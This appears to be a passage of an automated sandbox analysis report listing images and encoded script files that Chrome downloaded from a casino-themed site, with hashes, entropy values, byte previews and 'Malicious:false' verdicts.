                                                                                                                                                          SHA1:06FF0B6AB821A27293EDE8A5B2704A8C80275237
                                                                                                                                                          SHA-256:1DB58C93AFC32FF6EC3B0C3A1087C442CC7F67B31F19BF63BDA4076DBF0C38FF
                                                                                                                                                          SHA-512:02233D0E2015769302CC3BDA5CE45E6A482418B8A9A2CA086D2DDC0D24FE81261966D49E442131059C8FE67EBC6744714DDE7C199620AB7CDA93BA98BBFD8A93
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...N...Q.....2.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 13 x 15, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1231
                                                                                                                                                          Entropy (8bit):6.66519511317946
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Ox1hfvWwjx82lY2T3JVEw7VyJ3V7OoG6/OxOPUvyr0tXL0S:OfANn2NYJ3PRS1vr3
                                                                                                                                                          MD5:095384A3B8F6BDD2990AF1A72046314A
                                                                                                                                                          SHA1:5E28071F38D52C640E18BF0D7E6B8EF544421304
                                                                                                                                                          SHA-256:EBA7F5836E74727B61E9798568E1E702930E56976AE4553C789E7F9E2F564C9A
                                                                                                                                                          SHA-512:EBC28DB8D5C9945F4798C4EA41E009F5757082C6508BBFF7F67660A8DB46BFED6A96E20517F4EABC5ABA2A3859A2AF340ED77CCE2DFD83F720EEA8C17CEA17EF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............?#Ew....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:89BEDCDE50A211E79825BDC4A10D7296" xmpMM:DocumentID="xmp.did:89BEDCDF50A211E79825BDC4A10D7296"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:89BEDCDC50A211E79825BDC4A10D7296" stRef:documentID="xmp.did:89BEDCDD50A211E79825BDC4A10D7296"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.z.f...?IDATx.|..+.a....%.....u7JV..%)..BqK..(.)Y*.Zx)..P,$u..%....V..wl.(..S...S.f.y.<.9g...p.(...Q..Y.#...Y...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):370771
                                                                                                                                                          Entropy (8bit):7.975876313149277
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:5i0fJZNmLt5J0fJZNmLt5J0fJZNmEhwstxgVn9Rg/5EOgCNc5ARgOD8zfVn8zfVj:5iaI5JaI5JaDf1/5EpCNAARgWwVnwVnj
                                                                                                                                                          MD5:E64CF555E04E90C84DE126CD1342C2A8
                                                                                                                                                          SHA1:70ED3BCD7739CE4C8BC845C697A5C8D1470997E7
                                                                                                                                                          SHA-256:C5B6B055E5148FC073AFBAA7DE1818868E0D7D7DCF36A9989808EE55EEFCD53A
                                                                                                                                                          SHA-512:4BB5659AC1C42F05524A91981BB84E1B4ABCE63EB16300E354FB3EA9DC922B3542F5374FD6799A4107021292930414F5C32ED560EDDED08A6F2B466F1624B5A7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/5a3c598b993dd0d99c3e7a68e0323f3b.gif
                                                                                                                                                          Preview:GIF89a..d......k............3.Lf.......7..4k.....!rmf..........p."#..R.x\).C.x..Op.....`...,....#.po.h.m(......U.l.e.B.Z...s..!.......J....n-...............K.d.....V..E.....pK....oN+..p..!.........'......P.QQ...Q)..,...P...=.3..j..l.......-.w-..(.J..E..j....M.p+..2.Q(.l...I.cc.K.ka.......(....<.Gj.|N..yd0."!..j.TK5..-...........54....\......F.jR:,..S.E9d...f7.PI......4..]....J....P,.)1..!.....4.4..........e..%{.H.'..uL.{..:.......|V....$.p.....NI......8..E.|..a........\.r(.J.....fx.9.....;4..:|/.Q"..............E ....CU..5%.U/...>......3.........!......,..V.......Ej.&P.&......................aa..``:..{{F_..2...........11.19....)1.......)).......!!.......!).)*.!).9{.19.!!....;8!.....K...</.......AB.).....11...C.W...6:............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37279
                                                                                                                                                          Entropy (8bit):7.990998357157429
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:VjWLXKQYd2Z9X+NiFJiZtIBXAsAhzRAOBGiH4n2BQiZ+Yh0a:YLDZ9X+Ql72RA/iYnT1Da
                                                                                                                                                          MD5:ED8215D9B7270645FED0E644D3D372EB
                                                                                                                                                          SHA1:059E36C409682CDF5DD4CFBF133F69A0395677B5
                                                                                                                                                          SHA-256:E6413408D2F7EDFD869B03C33565FF7103F9892409F4A77FDD74EFB6C0F28256
                                                                                                                                                          SHA-512:E0394829B36AA20756EE038CE2EF774E9A9F9BB62B5D97A3719CEC43794E59268FB0941809CD69D7838A5120BE8BC789C2386F6E479A06D975FE40D851E4F4B0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/liveCasino/05.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua... .IDATx..}..T............)..b,.X.%.g....41..%..$/.X...FM4j..k..Q...._....>...o....\b~........5k...o.MB.~..%U...b...bp....M.....F.."(.z|....}.U..44..M....C..(.v!%..i.Z.,.o.1....\.1..B...y...j....|..k...~wSf...x..0..*.....-.p..UJ......{..6LQ._.:....z.....G...t.....XL.m.G.y..?..{........?...|9&.....PQ.C-.>...'.....p.Jh.^...q...=0......??.q./F.C..P..hr!D..Q!..]+....W..v..C.7...x...?.y.kM..BA.8...u.OB..H..r_.%..yYGNrh........+...b....Q..f@..K..._L..O.?.l}e..~...._..B{:.........O...e.....A.../.?e.#K..0.B*....nzz9......p..k.d.LCO...].......K.6@.pn..Zl.F*A}_.K.w..S.....|(.>.]..._.q..d..._.W\.O..@..m$..........R.........^.WE.].Q...?.4...._....a.v).^....%........<..g.F......nFD....|..W].d&.._...)_ie+.*..Qq't.A..)G>;.....M.?.&.W.2O]P*.N...pA.g.}.w$eA....fe.r.S...? .*.....f%uZ...3.kw.=....`.....2J.....3kJ.@.)..l..G..C1.....h.....W...O...[.........y8.N.G...*.........".t..x8...+%_Ue.8d.s5.sS....Q..}m.k....'2......h.....$
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/dg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1979
                                                                                                                                                          Entropy (8bit):7.43816398930614
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:7ANn2N1YJ31WQTLkSei0ah9e8+/CjqD8uUr:c2QLQiLZ+/CZv
                                                                                                                                                          MD5:C7FEF1618C5C8A11A201B4A062C23ED6
                                                                                                                                                          SHA1:63EEB8430F24572719EEB9C6A9FB5B82B3511B14
                                                                                                                                                          SHA-256:F8F8C49479A704ADB7A633492E0C47E7F8D099CB01FF4E4FF654EC04CA6294DD
                                                                                                                                                          SHA-512:C138138632689424429B89FE46C4C47A73946068BDEDCCD14FE8AD54C3B544CD9C22FC749C5C4F4B69F21641B8ED6292EF3254DEC567C9A62BEB971BE3BC99B2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:48CF716455BD11E99A67F2F3D966C0A4" xmpMM:DocumentID="xmp.did:48CF716555BD11E99A67F2F3D966C0A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:48CF716255BD11E99A67F2F3D966C0A4" stRef:documentID="xmp.did:48CF716355BD11E99A67F2F3D966C0A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>#P./...+IDATx..VklSe.~O{...n.;...T..*..#*jL\...$........ 3.K..d..M$f.?..d...!.w)....,..[...AG..k{...j.u...Db.<.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aws.bakeddove.com/ocs/cc.png?1717972881233
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4559
                                                                                                                                                          Entropy (8bit):7.827106635894467
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:CYzFTu2heep4YiLjLEakvXcg1gss5/1cyk59lGWpgFrimmKilbXCDDd:zw73vkv9gt5/yyGcUgFrimmKdd
                                                                                                                                                          MD5:B086C524DDE5F4979489F6A64E0B083C
                                                                                                                                                          SHA1:2BBC83084C9CEBFD37AAD47C5B65C12D5C671CFA
                                                                                                                                                          SHA-256:ABF134961C24281B03DF0BCBD87E497F81F727D3AF64EABEFC81261F978B876C
                                                                                                                                                          SHA-512:3D41230324900CC69468126AC240FD74BC45FE43794F53F4D94744608CAE199ED3B047728A16F44667CE67F96775065FD36B690AC4ACB710F8C4358343DEBBCB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:070664E1F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:070664E0F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.|.W....IDATx..[ytT....6[f&!!.kY....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2572), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2572
                                                                                                                                                          Entropy (8bit):5.887867517806268
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VghC7ZO82GULpZ5EigdeUU2jbol+y/NEGMihUyCcYIJgEX8YWOFRt:VCC7k827TT/UU2jbC+QNPJgEX8iRt
                                                                                                                                                          MD5:12CFC2BA3F138DF6CD035FC112CC1D9D
                                                                                                                                                          SHA1:C824176EE01E6BEDC7499A11353962B40B127BC5
                                                                                                                                                          SHA-256:A94F91A44C80A9B48810B01B2AEE266ACF370968303BA010CDB317867E799D8C
                                                                                                                                                          SHA-512:D7C282E9C47910B2F9412499BF1CDD3327AC5848FA07E76EC686C87667D06F2C03A15875356CA53557B2A5CFA10DD52B7D13FA54FD9DB744230CDA2EDA6FC4F3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/logo.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALATgAYBdAGgG8BRASQDcEAuAMwFc0YAXAS3Uw9JCkoASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKWihfFhAGAEJCAF9hFWD5aRQAXihMMUIYCCYxYVIkZMw0jK4zAAtcoXSAeloAcVxcvN9U3TRMJDyuZPI0KABbcLFfFABzFED9KA4oZjZOHnbReRAOFnk0chh9NDNpsoYUAyMoPw5dAGF0OSg0c+20AAkUOVI4EDskBkJSLiQAZTKKGADDEFzKlkGYgiySOhiYp185wAqtxfLpRqsAEKWYBSeSYPJIIHAAAyYxQkQAjKQRuMGORovkSf8AOoAMWp+WATEet30F18UAAXsKGcAuPoOAcxIEyiAuKMyhxQWImUwhcT/vZ/OLJdLQbhCIQIAAPOUKpUqsQAZmNZsCVlgXHs32i7tIg2l3i+5CkHHJ9NY7G4vA4ogS0hAyWlfxUcJOZ10qK46L+1H6UExABEdN4QPpCQB+BMIpMp9GYji5mD5/QZrMgLFQKQANlwfGEumlIHawYWYdEIF0dKOcjs/mwYjAsDgo0sbH0AFouJnMWJiMkJPJfOkANQcPe5NXCBixpAjim6ceT6ez+coRcrtcBTfb3diPd8EvHMtIy7XDMdy6CwEAjFA+jPHIB6gtUq6NkuEAwNUo7VDYljyLoEBoKMuRHsIapMjAKzTAWcwhoshLkJGHAxmUfwCMkEpoPowK6P8ADS1AAHIqMUVIAIKaLhwjpLo1SfiAR5wSxICmromhILk3byn28yhu0IARlAiRQMkw7yhBNiXuMKjOBiqxFKQYg3sOM7wA+T7weuwgAD6ueZ/pWTZOp2feC4sc+jaBLKcSRgUUDXr5ugSlKZS/K0tm6PKirKqQozJOikVVuko57NKuQqOcAAkpimhwAAqShwJg/YaVR5yj
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 265 x 110, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17506
                                                                                                                                                          Entropy (8bit):7.971437669340104
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:KSVE2B0sGy6wx0sea+jYjpRmHDoMnMqAcShleQ/U9pvM4X8t+:HVE2Bhjisea+jYKDXMqnclynvM4g+
                                                                                                                                                          MD5:CA9847D6D1697A8FA6084921630F427A
                                                                                                                                                          SHA1:82572D8084FBFB22A10D4E1FC59AE108DD1B8316
                                                                                                                                                          SHA-256:91B5A490C5866413634F02D3C67BDB4084DB4AC6D496B42D94540C2E7F91AEFB
                                                                                                                                                          SHA-512:A7DF1E877D8B93DB7F78A46ECB1B6CA3419D7F4B957B23DA5FEBF3EF73D8C92C34C922D900FFB8A83E25000C97BAF0D875A747A4E2B50E44A9B5CB3519A5487B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/games/games_3.png
                                                                                                                                                          Preview:.PNG........IHDR.......n.....4..2....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:DC2A015B1E2F11EEA737E951EC38508F" xmpMM:DocumentID="xmp.did:DC2A015C1E2F11EEA737E951EC38508F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DC2A01591E2F11EEA737E951EC38508F" stRef:documentID="xmp.did:DC2A015A1E2F11EEA737E951EC38508F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.O....@.IDATx..]...E..=y'..9....d...*..I......N...@.t&T."p(...7..9....0;..z5.....P..kz.........Uh.eY...^x
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 814 x 101, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13310
                                                                                                                                                          Entropy (8bit):7.971522442627064
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:E1KpSMF41AprsMtlMKzqaNdhUpTcDx45d6IQ82v:EwpNu1ARca3hUpTIx45kISv
                                                                                                                                                          MD5:673B130AD21275EAA8CCEE3A407B1363
                                                                                                                                                          SHA1:ABBE1E6466DC438959FD8B5CDF9664080F30C2FE
                                                                                                                                                          SHA-256:B9B6AB59F95AE2D92FB62B0BB7986949EB670EE70DFACE162E38F3B25CD2CABA
                                                                                                                                                          SHA-512:E34BDC7A9FF1F9351320B9D493BD281CF3CEB7891E59D9A0B5DD74E11EAFA9DF9B40A88FD36989C1D0E907BA1A5514B7A5BB0939B4D114ECA92DF55518B82C75
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......e.......G.....PLTEGpL...........................................uuu........~~~.............T....................9g]aaa....I=...........{...H.....N.kkkvvv.P..I.......Z.x.O.,]RGrha.~.THRys.......T...........K....r..j......N.....O..S.n....+.N..F...L........{s.R........W..m.......u.O..mp..(..}..........2y.M....._..H..S.-..........-......s.*.O................|.WWWlll..7.E|.@3.......P............................................001CCC...:::....$..)../.....6'($......MLL.|..p..........hgg....]..............ttt............................___dcc.H....~||...........m.......[Z[......X..p....9....~..^}..Wa...18"...r.........s}.X..{T...u....>36... ..SMG.....p.2i.p....\..5....0L.l......e..}.0[n.G]..,&.. >v..f-)....n..e.Mv..x..:..G..}M6e.+7.WV.....M.*.....e).6.....ttRNS..- ...@....0;``..J..rP.p.$Wb.n.=..z.3....Y...+L......9.k...... K..V...k..M..@....a...w..V.S........m......;>... .IDATx..}L.y.....v...B.../...........<.a....\r....qf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (27136), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):27136
                                                                                                                                                          Entropy (8bit):5.695191668316121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:DPnJVDMd9YAgKAQ3fgKAQ3fgKAQ3fhdV0:znJVDLxxmdV0
                                                                                                                                                          MD5:9CB313BAE3305AA77AFB3906885861B4
                                                                                                                                                          SHA1:F5682DC801F0C648236371600370ADAE9D70D4DD
                                                                                                                                                          SHA-256:6C4355A56536B5CB74199A2ECF522A9AECF36FEB6489A50B77F37533093F7771
                                                                                                                                                          SHA-512:99563A6B078875CC36FF8417462BEF8228412E1AF46922C70E08626168C7D49B5142399A8465A228FF831BA56D9DD483AA3E96B1024CC415094E10D1BEFF10F2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202307/202307192352577.png
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiEw6z68LrrwO2flo3B+D7GwlbtYXP42+1IRuEJKIdW137/se9qtv8SpehS8sDI3PMhhOjiaLb3FraTmbpctNvwkCCkQesDdjqkjku9k9lV3icAZtjkX8XlYhpA6SpYdVWMzGqK0MJI2dSUThy22ZN9saPFG17dG057YKe6mozwl4A7BIKpf44V1cmVb8EH43xs7p6RFzAC8KUsJ97beLm3eHGNnW4JvQD1dDoNEsfzOwwlOxL71cptXDb3f+0wYOybwe0aPQbz1dKtOzRu/AWY900JIzCtVqmgQ7f4E9pwHSeU4Ru6RzFCIoN2c1UtHO70evXk3V+/y7hZhFHiU34QiTNdPFYSlEjpmaD8wwBm+oy/R7lFCM5vTvgVG9K8a/89xP0di85LFuhbZujinu+fBwEcFq7nrqusU46ZH4wY8TalLMaoBB3qsX0OgWcLtgwCruIZasaF3LfNc5e6FfErI4Tq4b7+eP3jm/8cJWB0UnN03/vv7NRbK6i5QgU+wgj58PY7sWq+2BugmR8smYuLZetTCQYRWHaYsghz9wQUPfUpgPQgz/iQysv+Ni4sUBxfTRblTl8zcUnruFQPDTumwMqpnqaaRORboWwmNlXi3Dkv4GA6q0ZzZ2GhutWmYCH+0PpivpGXaAhXgdy1eMg7gZLeUUN/PsYon/zGbAVVQU38wAGvPnV0l7w7gzMry+qu6xv+r/ILSt0hX1PYQhppfAhVIwI2D2Y3RnvIDFtS9
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31140
                                                                                                                                                          Entropy (8bit):7.9885125318058625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:Fn3z4wyH1Lg4+yPAcybUYBf1T+09KXhF6FeSgsK0HjXJD:9jryHhOsAcybUYBtT2RFWg10zJD
                                                                                                                                                          MD5:87BD274EE075D497D177232AFB7B3EEE
                                                                                                                                                          SHA1:E6B36A4CE9B2FFB60D97A4BB31DF520987A0C675
                                                                                                                                                          SHA-256:4679E5FE6CBC8D279B01A15DAED7D8FAF25CC395A79B4D255BB946D113DA6475
                                                                                                                                                          SHA-512:D1267C76CA29F1272DA2D9F46B760BB70AD0CB85884EEAE7144E45B88B050867756C3122B527476250853B9F16491717752E95F9ADCE2C3DB19A77D2034E40B4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
